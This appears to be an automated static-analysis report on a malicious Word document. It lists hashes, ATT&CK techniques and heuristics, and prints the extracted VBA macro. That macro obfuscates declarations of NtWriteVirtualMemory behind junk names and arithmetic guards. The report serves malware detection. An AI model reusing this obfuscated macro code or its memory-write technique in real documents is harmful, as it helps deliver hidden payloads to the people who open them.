Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a632f8f0b8388bd0…

MALICIOUS

Office (OLE)

181.5 KB Created: 2017-12-05 15:14:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: bf394df4243b7b6377b6be5c8dd2e89e SHA-1: 753d2e0a4d9b20a7da77476a1f3c07c1cffce21f SHA-256: a632f8f0b8388bd0703041ba8813943303e9d5e6234b18a4587531784e8c8916
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an Office document containing VBA macros. The macros use obfuscated declarations for functions like 'NtWriteVirtualMemory' and 'GetOverlappedResult' from 'ntdll' and 'Shlwapi.dll' respectively. This suggests an attempt to write to memory, a common technique for executing downloaded payloads. The OLE slack anomaly further indicates potential hidden or packed data within the file.

Heuristics 3

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 185,856 bytes but its declared streams total only 110,997 bytes — 74,859 bytes (40%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1460 bytes
SHA-256: 4c09c84fb02c66466523de80d2a57c50ef2c7344973a79d7c6dec0b829c976ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cystoplegia"
Attribute VB_Base = "0{5396473A-D849-43F5-B0EB-566F2263570B}{5C8232ED-6D86-4F76-A74E-CA80605CB1D0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bulbulator"

Attribute VB_Name = "plinersd"
#If (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Public Declare PtrSafe Function unauthorized _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal adapid As Any, ByVal ramify As Any, ByVal evangelist As Any, ByVal baroreceptor As Any, ByVal acutely As Any) As LongPtr
Public Declare PtrSafe Function euphorbium Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal chipping As Any, gangrenous As Any, categorial As Any, aerodynamics As Any) As LongPtr
#ElseIf (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Public Declare Function iceboat Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal diligence As Any, acanthocephala As Any, aforethought As Any, caramel As Any) As Long
Public Declare Function unauthorized _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal tonsil As Any, ByVal temperamentally As Any, ByVal inordinately As Any, ByVal afield As Any, ByVal iii As Any) As Long
#End If